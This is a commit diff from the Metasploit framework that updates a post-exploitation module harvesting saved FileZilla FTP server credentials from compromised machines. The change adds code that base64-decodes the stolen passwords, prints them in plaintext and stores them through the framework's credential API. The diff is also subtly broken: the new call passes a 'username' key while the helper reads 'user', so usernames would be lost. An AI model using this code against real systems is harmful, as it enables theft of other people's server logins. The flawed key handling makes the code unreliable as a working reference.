Land rapid7#5451, @wchen-r7 Update filezilla_client_cred to use the new cred API

jvazquez-r7 · jvazquez-r7 · commit c3437dab2a54 · 2015-06-05T16:39:31.000-05:00
diff --git a/modules/post/multi/gather/filezilla_client_cred.rb b/modules/post/multi/gather/filezilla_client_cred.rb
@@ -103,6 +103,44 @@ def check_filezilla(filezilladir)
     return nil
   end
 
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      post_reference_name: self.refname,
+      session_id: session_db_id,
+      origin_type: :session,
+      private_data: opts[:password],
+      private_type: :password,
+      username: opts[:user]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def is_base64?(str)
+    str.match(/^([A-Za-z0-9+\/]{4})*([A-Za-z0-9+\/]{4}|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{2}==)$/) ? true : false
+  end
+
+
+  def try_decode_password(str)
+    is_base64?(str) ? Rex::Text.decode_base64(str) : str
+  end
+
+
   def get_filezilla_creds(paths)
 
     sitedata = ""
@@ -155,14 +193,14 @@ def get_filezilla_creds(paths)
           else
             source_id = nil
           end
-          report_auth_info(
-            :host  => loot['host'],
-            :port => loot['port'],
-            :sname => 'ftp',
-            :source_id => source_id,
-            :source_type => "exploit",
-            :user => loot['user'],
-            :pass => loot['password'])
+
+          report_cred(
+            ip: loot['host'],
+            port: loot['port'],
+            service_name: 'ftp',
+            username: loot['user'],
+            password: try_decode_password(loot['password'])
+          )
         end
       end
     end
@@ -214,7 +252,7 @@ def parse_accounts(data)
       print_status("    Server: %s:%s" % [account['host'], account['port']])
       print_status("    Protocol: %s" % account['protocol'])
       print_status("    Username: %s" % account['user'])
-      print_status("    Password: %s" % account['password'])
+      print_status("    Password: %s" % try_decode_password(account['password']))
       print_line("")
     end
     return creds
